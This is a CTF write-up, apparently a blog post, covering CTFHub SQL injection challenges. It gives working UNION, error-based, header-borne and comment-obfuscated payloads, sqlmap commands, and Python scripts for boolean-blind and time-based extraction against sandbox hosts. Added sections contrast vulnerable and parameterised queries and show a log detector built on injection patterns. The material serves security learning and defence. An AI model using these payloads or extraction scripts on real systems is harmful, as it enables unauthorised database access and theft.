[Original] CTFHub skill tree: web prerequisite skills: SQL injection

Integer injection

Flag & basic steps (applies to any numeric (integer) injection)

Method 1: brute force by hand

1. Check whether an injection point exists

1 and 1=1 returns the normal result
1 and 1=2 returns an error

Normal: data is returned
Error: nothing is returned

2. Guess the number of columns

order by x (x is a number)

ORDER BY sorts the result set by the given column; when x is larger than the number of columns in the query, the statement fails, so the largest x that still works is the column count.

Here we try the values one at a time:

1 works
2 works
3 nothing

From this we infer there are two columns.

3. Next, dump the database name

1 and 1=2 union select 1,database()

Database name obtained: sqli

4. Dump the table names

1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

Table names obtained: news, flag

5. Dump the column names

1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

Column name obtained: flag

6. Dump the flag

1 and 1=2 union select 1,group_concat(flag) from sqli.flag

Result: ctfhub{7f95c9e82c76993d6695e97631bf80b646c2fd5c}

The concepts behind this part are covered together in the detailed SQL injection explanation.

Method 2: script - sqlmap

Note: the sqlmap used here runs under Python 2.

1. Query the database names

python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 --dbs

2. Query the table names

python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

3. Query the columns (-T needs the table name, which is flag here)

python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

4. Query the data

python2 sqlmap.py -u http://challenge-c210e68234c348d4.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump

sqlmap usage and steps

sqlmap -u ["url"] --dbs                                              # list databases
sqlmap -u ["url"] --current-user                                     # show the current user
sqlmap -u ["url"] --current-db                                       # show the current database
sqlmap -u ["url"] -D ['dbname'] --tables                             # list tables
sqlmap -u ["url"] -D ['dbname'] -T ['table'] --columns               # list columns
sqlmap -u ["url"] -D ['dbname'] -T ['table'] -C ['col1,col2,...'] --dump   # dump column contents

Other sqlmap details will be covered in the sqlmap hands-on post.

Character (string) injection

Flag

1. Query the database

2. Query the table names

112' union select group_concat(table_name),2 from information_schema.tables where table_schema='sqli'#

3. Query the column names

1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag

4. Query the column contents

123' union select flag,2 from flag#

Overall, the only real difference is closing the quote: the injected value has to terminate the single quote the application wraps around it before the rest of the statement can be appended.
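As an added illustration that is not part of the original write-up, the following Python script builds an in-memory SQLite database with a constructed `news` table and a `flag` table holding a placeholder value, then contrasts the two string-concatenated queries the integer and character payloads above rely on with a parameterised query. SQLite has no `#` comment, so the quoted variant's payload ends with `-- ` instead of `#`; the table and column names are assumptions chosen to mirror the challenge.

```python
import sqlite3

def make_db():
    """Constructed demo schema: a news table plus a flag table with a placeholder secret."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, data TEXT);
        INSERT INTO news VALUES (1, 'first post'), (2, 'second post');
        CREATE TABLE flag(flag TEXT);
        INSERT INTO flag VALUES ('flag{placeholder}');
    """)
    return conn

def vulnerable_lookup(conn, user_id):
    # Integer-type query: the request parameter is pasted into the SQL text,
    # so "1 and 1=2 union select ..." rewrites the statement itself.
    sql = "SELECT data FROM news WHERE id=" + user_id
    return [row[0] for row in conn.execute(sql)]

def vulnerable_lookup_quoted(conn, user_id):
    # Character-type query: the value sits inside single quotes, so a payload
    # has to close that quote first (the difference the write-up points out).
    sql = "SELECT data FROM news WHERE id='" + user_id + "'"
    return [row[0] for row in conn.execute(sql)]

def safe_lookup(conn, user_id):
    # Parameterised query: the value travels separately from the SQL text and
    # is compared as data, so it cannot add a UNION or change the WHERE clause.
    rows = conn.execute("SELECT data FROM news WHERE id=?", (user_id,))
    return [row[0] for row in rows]

def demo():
    """Run the page's probe shapes against both query styles and collect the results."""
    conn = make_db()
    union_payload = "1 and 1=2 union select flag from flag"
    quoted_payload = "123' union select flag from flag -- "
    return {
        "vuln_true": vulnerable_lookup(conn, "1 and 1=1"),        # normal row comes back
        "vuln_false": vulnerable_lookup(conn, "1 and 1=2"),       # nothing comes back
        "vuln_union": vulnerable_lookup(conn, union_payload),     # flag table leaks
        "vuln_quoted": vulnerable_lookup_quoted(conn, quoted_payload),
        "safe_normal": safe_lookup(conn, "1"),                    # still works for real ids
        "safe_union": safe_lookup(conn, union_payload),           # payload is just a non-matching string
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The `1 and 1=1` / `1 and 1=2` pair behaves exactly as described in the integer section against the concatenated query, while the parameterised version treats the whole payload as one (non-matching) value, which is the fix a code review should insist on.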

SQL error-based injection

Flag

1. Query the database

1 Union select count(*),concat((select database()),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

2. Query the tables

1 Union select count(*),concat((select table_name from information_schema.tables where table_schema='sqli' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

As you can guess, this is not the information we want.

Continue with the next row:

1 Union select count(*),concat((select table_name from information_schema.tables where table_schema='sqli' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

3. Query the columns

1 Union select count(*),concat((select column_name from information_schema.columns where table_name='flag' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

4. Query the column contents

1 Union select count(*),concat((select flag from sqli.flag),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

Boolean blind injection

Straight to the script:

import requests

urls = 'http://challenge-cbd41590d122d86c.sandbox.ctfhub.com:10080/?id='
true = 'query_success'  # text the page shows when the injected condition holds

# Each probe has the shape if(<condition>,1,<subquery>): when the condition is
# true the query succeeds and the page contains query_success; otherwise the
# multi-row subquery makes the statement fail and the marker is absent.

def database_name():
    name = ''
    for number in range(1, 8):                        # substr() positions are 1-based
        for letter in 'qwertyuioplkjhgfdsazxcvbnm':
            url = urls + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
                number, letter)
            response = requests.get(url)
            if true in response.text:
                name = name + letter
                print(name, '...')
                break
    print('\n>>>database_name=', name, '<<<\n')

def table_name():
    names = []
    for number1 in range(3):                          # first three tables of the current database
        name = ''
        for number2 in range(1, 8):
            for letter in 'qwertyuioplkjhgfdsazxcvbnm':
                url = urls + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
                    number1, number2, letter)
                response = requests.get(url)
                if true in response.text:
                    name = name + letter
                    print(name, '...')
                    break
        names.append(name)
    print('\n>>>table_name=', names, '<<<\n')

def column_name():
    names = []
    for number1 in range(3):                          # first three columns of the flag table
        name = ''
        for number2 in range(1, 8):
            for letter in 'qwertyuioplkjhgfdsazxcvbnm':
                url = urls + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
                    number1, number2, letter)
                response = requests.get(url)
                if true in response.text:
                    name = name + letter
                    print(name, '...')
                    break
        names.append(name)
    print('\n>>>column_name=', names, '<<<\n')

def get_flag():
    name = ''
    for number1 in range(1, 50):                      # the flag is shorter than 50 characters
        for number2 in range(48, 126):                # printable ASCII, compared by code point
            url = urls + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (
                number1, number2)
            response = requests.get(url)
            if true in response.text:
                name = name + chr(number2)
                print(name, '...')
                break
    print('\n>>>flag=', name, '<<<\n')

database_name()
table_name()
column_name()
get_flag()

Time-based blind injection

Flag

The detailed method is saved for the dedicated post.

Straight to the code:

import requests, time

urls = 'http://challenge-b8d41d0852a2709a.sandbox.ctfhub.com:10080/?id='

def is_true(url):
    # Each probe has the shape if(<condition>,sleep(1),1): a response that takes
    # longer than a second means the condition held.
    start = time.time()
    requests.get(url)
    return time.time() - start > 1

def database_name():
    name = ''
    for number in range(1, 9):                        # substr() positions are 1-based
        for letter in 'qwertyuioplkjhgfdsazxcvbnm':
            url = urls + 'if(substr(database(),%d,1)="%s",sleep(1),1)' % (number, letter)
            if is_true(url):
                name = name + letter
                print(name)
                break
    print(name)

def table_name():
    array = []
    for number1 in range(4):                          # first four tables of sqli
        name = ''
        for number2 in range(1, 9):
            for letter in 'qwertyuioplkjhgfdsazxcvbnm':
                url = urls + 'if(substr((select table_name from information_schema.tables where table_schema="sqli" limit %d,1),%d,1) = "%s",sleep(1),1)' % (number1, number2, letter)
                if is_true(url):
                    name = name + letter
                    print(name)
                    break
        array.append(name)
    print(array)

def column_name():
    name = ''
    for number2 in range(1, 9):
        for letter in 'qwertyuioplkjhgfdsazxcvbnm':
            url = urls + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema="sqli"),%d,1) = "%s",sleep(1),1)' % (number2, letter)
            if is_true(url):
                name = name + letter
                print(name)
                break
    print(name)

def flag():
    name = ''
    for number1 in range(1, 50):                      # the flag is shorter than 50 characters
        for number2 in range(48, 126):                # printable ASCII, compared as a string
            url = urls + 'if(substr((select flag from sqli.flag),%d,1) = "%s",sleep(1),1)' % (number1, chr(number2))
            if is_true(url):
                name = name + chr(number2)
                print(name)
                break
    print(name)

database_name()
table_name()
column_name()
flag()

Remember to convert the result to lowercase: the string comparison in flag() runs under MySQL's default case-insensitive collation, and uppercase letters (codes 65 to 90) are tried before lowercase ones, so each letter is matched in its uppercase form.

MySQL structure

Flag

I'm not very good at doing this one by hand yet, so I just let sqlmap rip.

Note that the flag is in this table.

The other table, when dumped, only shows this information.

That is the column information.

Cookie injection

The technique is unchanged; the injection point just moves from the page into the packet-capture tool.

Flag

By hand

First enter 1 and see what happens.

Well, I think everyone should get it by now.

1. Query the database

1+and+1=2+union+select+database(),2#

2. Query the tables

1+and+1=2+union+select+group_concat(table_name),2+from+information_schema.tables+where+table_schema='sqli'#

3. Query the columns

1+and+1=2+union+select+group_concat(column_name),2+from+information_schema.columns+where+table_name='sjezkujtwr'#

4. Query the column contents

1+and+1=2+union+select+cinmtrnyyz,2+from+sqli.sjezkujtwr#

The sqlmap usage for cookie injection differs from the earlier cases, so it is noted here.

Script: sqlmap

1. Database name

python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1"  --dbs

2. Table names

python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" -D sqli --tables

After the steps above, you can guess without looking that the flag is in sjezkujtwr.

3. Columns

python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" -D sqli -T sjezkujtwr --columns

4. Column contents

python2 sqlmap.py -u http://challenge-6e98ef84482d1504.sandbox.ctfhub.com:10080/ --cookie="id=1" -D sqli -T sjezkujtwr -C cinmtrnyyz --dump

UA injection

Flag

By hand

This injection is the same as the earlier ones, just moved into the User-Agent header.

That's the idea.

1. Database

1 and 1=2 union select database(),2#

2. Tables

1 and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema='sqli'#

3. Columns

1 and 1=2 union select group_concat(column_name),2 from information_schema.columns where table_name='vukfimjwtg'#

4. Column contents

1 and 1=2 union select lgbnyifysd,2  from sqli.vukfimjwtg#

Python code

To be written...

Space filtering

Flag

By hand

Overall it is the same idea; replace each space with an inline comment and the payloads work unchanged.

1. Database

1/**/and/**/1=2/**/union/**/select/**/database(),2#

2. Tables

1/**/and/**/1=2/**/union/**/select/**/group_concat(table_name),2/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'

3. Columns

1/**/and/**/1=2/**/union/**/select/**/group_concat(column_name),2/**/from/**/information_schema.columns/**/where/**/table_name='jdyrbbxovi'

4. Column contents

1/**/and/**/1=2/**/union/**/select/**/sfuqqyytbz,2/**/from/**/sqli.jdyrbbxovi

Script: sqlmap

To be written

Referer injection

Flag

By hand

The payloads are identical to the UA ones, so they are not repeated here.

1. Tables

2. Columns

3. Column contents
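From the defender's side, the Cookie, User-Agent and Referer sections above all show the same payloads arriving in different request fields, the space-filter section shows them with /**/ in place of spaces, and the blind and time-based scripts send if(substr(...)) and sleep() probes in the query string. The following Python script is an added example, not part of the original write-up: it normalises each of those fields in constructed JSON-line access-log records (made-up IPs, payloads shaped like the page's) and reports which indicators a detection rule would flag. The record format, field names and indicator list are my assumptions.

```python
import json
import re
from urllib.parse import unquote_plus

# Constructed sample log records (JSON lines), one per request. The injected
# values mirror the payload shapes in the write-up; hosts and IPs are made up.
SAMPLE_LOG = r'''
{"ip": "10.0.0.5", "query": "id=1", "cookie": "session=abc123", "ua": "Mozilla/5.0", "referer": "http://app.example.test/"}
{"ip": "10.0.0.7", "query": "id=2", "cookie": "id=1+and+1=2+union+select+database(),2#", "ua": "Mozilla/5.0", "referer": ""}
{"ip": "10.0.0.8", "query": "id=1", "cookie": "session=def456", "ua": "1 and 1=2 union select group_concat(table_name),2 from information_schema.tables where table_schema='sqli'#", "referer": ""}
{"ip": "10.0.0.9", "query": "id=1/**/and/**/1=2/**/union/**/select/**/database(),2%23", "cookie": "", "ua": "curl/8.0", "referer": ""}
{"ip": "10.0.0.9", "query": "id=if(substr(database(),1,1)=%22s%22,sleep(1),1)", "cookie": "", "ua": "python-requests/2.31", "referer": ""}
{"ip": "10.0.0.10", "query": "id=1", "cookie": "", "ua": "Mozilla/5.0", "referer": "1 and 1=2 union select database(),2#"}
'''

# Indicator patterns, matched against the normalised value of each field.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\("),
    "error_based": re.compile(r"\bfloor\s*\(\s*rand\s*\("),
    "boolean_probe": re.compile(r"\b(and|or)\s+1\s*=\s*[12]\b"),
    "substr_probe": re.compile(r"\b(substr|substring|ascii)\s*\("),
}

def normalise(value):
    """Undo the encodings seen in the write-up: '+' / %XX URL encoding and /**/ in place of spaces."""
    text = unquote_plus(value)
    text = re.sub(r"/\*.*?\*/", " ", text)   # inline comments used to dodge space filters
    text = re.sub(r"\s+", " ", text)         # collapse runs of whitespace
    return text.lower()

def scan_record(record):
    """Return the (field, indicator) pairs triggered by one log record."""
    hits = []
    for field in ("query", "cookie", "ua", "referer"):
        text = normalise(record.get(field, ""))
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.append((field, name))
    return hits

def scan_log(log_text):
    """Parse JSON lines and return one alert per record that triggered an indicator."""
    alerts = []
    for line in log_text.strip().splitlines():
        record = json.loads(line)
        hits = scan_record(record)
        if hits:
            alerts.append({"ip": record["ip"], "hits": hits})
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["hits"])
```

Decoding `+` and `%XX` once and stripping `/**/` is what makes the space-filter variant match the same rule as the plain one. Blind and time-based extraction needs hundreds of near-identical `substr`/`sleep` probes from one client, so counting `substr_probe` and `time_delay` hits per source IP over a short window is a cheap second signal; a production rule set would also handle nested encodings and request bodies.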

Done!

A more detailed analysis will follow in the SQL injection (beginner) post, where everything is explained more carefully.

[Original, featured, very detailed] SQL injection summary (beginner and CTF editions)

Freeloaders and leechers, keep out!!!

==> Please credit the source when reposting <==

Comments

  1. huayang
    huayang (blog owner)
    11 months ago
    2021-2-28 10:44:09

    Take a look
